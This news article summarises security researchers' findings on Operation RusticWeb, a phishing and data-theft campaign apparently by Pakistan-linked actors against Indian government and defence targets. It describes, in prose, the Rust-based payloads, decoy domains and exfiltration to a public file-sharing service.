Pakistan-based hackers are targeting the Indian government and defence industry under Operation RusticWeb. Under this campaign, threat actors use new languages like Golang, Rust, and Nim to compile the code, making detection difficult.
One interesting point is that the documents are exfiltrated to a web-based service engine, OshiUpload, instead of the traditional command and control (C2) server. Researchers from Seqrite found at least two infection chains targeting India via new Rust-based payloads.
Researchers also found that the threat actors used fake and malicious domain names to lure the victims. Some of these domain names correspond to reputable NGOs and organisations such as the Army Welfare Education Society (AWES), Parichay (a government SSO platform), IPR from the Department of Personnel and Training, nomination form for Defense Services Officers Provident (DSOP) Fund, and Kailash Satyarthi Children’s Foundation.
Infection chain 1
Researchers observed that in the first infection chain, the threat actors used spear-phishing techniques to lead the victim to an IPR_2023-24 file. This double extension file is a Windows shortcut file masquerading as a legitimate PDF.
When the victim clicks on the file, it downloads a script from the rb[.]gy domain. The multi-staged attack progresses through a PowerShell stage, a downloader system check stage, and culminates in a final stealer stage.
The PowerShell script intricately sets up URL paths for downloading subsequent payloads and creates a decoy PDF file masquerading as a form related to the ‘Indian Administrative Service’. The downloader stage introduces a Rust-compiled binary, checking system information and establishing persistence.
The final stealer payload, also Rust-based, employs sophisticated techniques to collect files and system data, uploading them to an anonymous public file-sharing engine named OshiUpload.
When researchers analysed the campaign’s victimology, they found a deliberate focus on the Indian government officials. Although the data doesn’t confirm specific victims, the campaign went live in September, with a significant surge in activity observed in October.
Notably, 26.53% of the activity during this period originated from India, providing crucial insight into the attackers’ geographic targets.
Infection chain 2
The investigation also uncovered a second infection chain in December, showcasing the adaptability of the threat actors. This variant employs maldocs and encrypted PowerShell scripts.
Phishing maldocs with VBA macros initiate the attack, containing encrypted PowerShell commands. The scripts download decoy files and next-stage scripts from fake domains, eventually executing Rust-based payloads for enumeration and exfiltration.
All the fake domains that the threat actors used targeted government services such as parichay.epar[.]in or parichay.nic.[.]in. Parichay authorises government employees for NIC services, while Jan Parichay does the same for citizens.
“Operation RusticWeb could be linked to an APT threat as it shares similarities with various Pakistan-linked groups. As threat actors shift to malware developed using newly compiled languages like Golang, Rust, and Nim, we recommend proceeding cautiously and taking necessary precautions to stay protected,” said researchers.
In the News: BattleRoyal cluster spreads DarkGate through varied channels